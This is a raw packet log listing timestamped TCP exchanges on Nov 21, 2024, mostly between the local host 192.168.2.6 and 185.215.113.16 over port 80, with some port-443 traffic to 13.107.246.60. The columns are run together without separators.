                                                                                                                                                                        Nov 21, 2024 10:37:45.155303001 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.160372019 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.160510063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.160547972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.165416956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.165569067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.165606976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.170559883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.170701027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.170741081 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.175776958 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.175856113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.175898075 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.180748940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.180915117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.180958986 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.185859919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.235924006 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.293788910 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.293895006 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.293972969 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.303731918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.303940058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.303998947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.305541992 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.305634975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.305680990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.309551954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.309906960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.309952974 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.313472986 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.313498020 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.313510895 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.313518047 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.313661098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.313702106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.313740969 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.317135096 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.317159891 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.317214966 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.317583084 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.317595959 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.317998886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.318197966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.318242073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.321748972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.321804047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.321852922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.325884104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.325999022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.326056004 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.329947948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.330071926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.330117941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.334058046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.334152937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.334203005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.338263035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.338342905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.338383913 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.342247963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.342262983 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.342329025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.346342087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.346374035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.346417904 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.350445986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.350461006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.350517035 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.354553938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.354607105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.354652882 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.358630896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.358697891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.358738899 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.362668991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.362715960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.362756014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.366775036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.366872072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.366921902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.370902061 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.370946884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.371001005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.373272896 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.373694897 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.373720884 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.374138117 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.374146938 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.375078917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.375169039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.375207901 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.379065990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.379204988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.379251003 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.383176088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.383255959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.383310080 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.387234926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.387329102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.387377024 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.391316891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.391386986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.391423941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.395495892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.395550013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.395611048 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.399504900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.399574041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.399621964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.403669119 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.403755903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.403809071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.407749891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.407857895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.407902002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.411802053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.411870956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.411915064 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.415894032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.416007042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.416049957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.419970036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.420085907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.420137882 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.424037933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.424175024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.424222946 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.428127050 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.470314980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.504564047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.504669905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.504722118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.506156921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.506267071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.506308079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.509454966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.509519100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.509566069 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.512718916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.512823105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.512868881 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.516042948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.516066074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.516104937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.519232988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.519360065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.519412041 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.522353888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.522490978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.522535086 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.525420904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.525516033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.525563002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.528383017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.528501987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.528546095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.531375885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.531429052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.531533003 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.534311056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.534406900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.534459114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.537177086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.537319899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.537364960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.540118933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.540183067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.540229082 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.542902946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.543117046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.543164968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.545794010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.545830011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.545876026 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.548439026 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.548506975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.548552036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.551110029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.551345110 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.551393032 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.553822994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.553915024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.553967953 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.556628942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.556655884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.556699991 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.559237957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.559303045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.559346914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.561897993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.562017918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.562057018 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.564596891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.564753056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.564795971 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.567353010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.567526102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.567569971 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.569942951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.570075035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.570116043 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.572623014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.572734118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.572773933 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.575341940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.575433016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.575473070 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.578011990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.578159094 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.578202963 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.580738068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.580750942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.580791950 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.583472967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.583544016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.583590031 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.586065054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.586190939 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.586232901 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.588809013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.588977098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.589035034 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.591486931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.591726065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.591768980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.594149113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.594290018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.594340086 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.596956968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.596971035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.597027063 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.599605083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.599630117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.599673033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.602252007 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.602380037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.602436066 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.604929924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.605113029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.605226994 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.607611895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.607711077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.607758045 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.610285997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.610517979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.610558033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.613001108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.613106966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.613154888 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.615669012 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.615798950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.615839958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.618345022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.618465900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.618511915 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.621021986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.621160030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.621215105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.623776913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.623853922 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.623900890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.626379013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.626506090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.626555920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.629237890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.629354000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.629403114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.631808043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.632066011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.632107973 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.634572983 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.634716034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.634766102 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.637175083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.637291908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.637336969 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.639851093 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.639965057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.640012980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.642543077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.689049006 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.707396984 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.707494020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.707540035 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.708091974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.708328009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.708369970 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.709997892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.710058928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.710113049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.711420059 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.711549044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.711595058 CET4978780192.168.2.6185.215.113.16
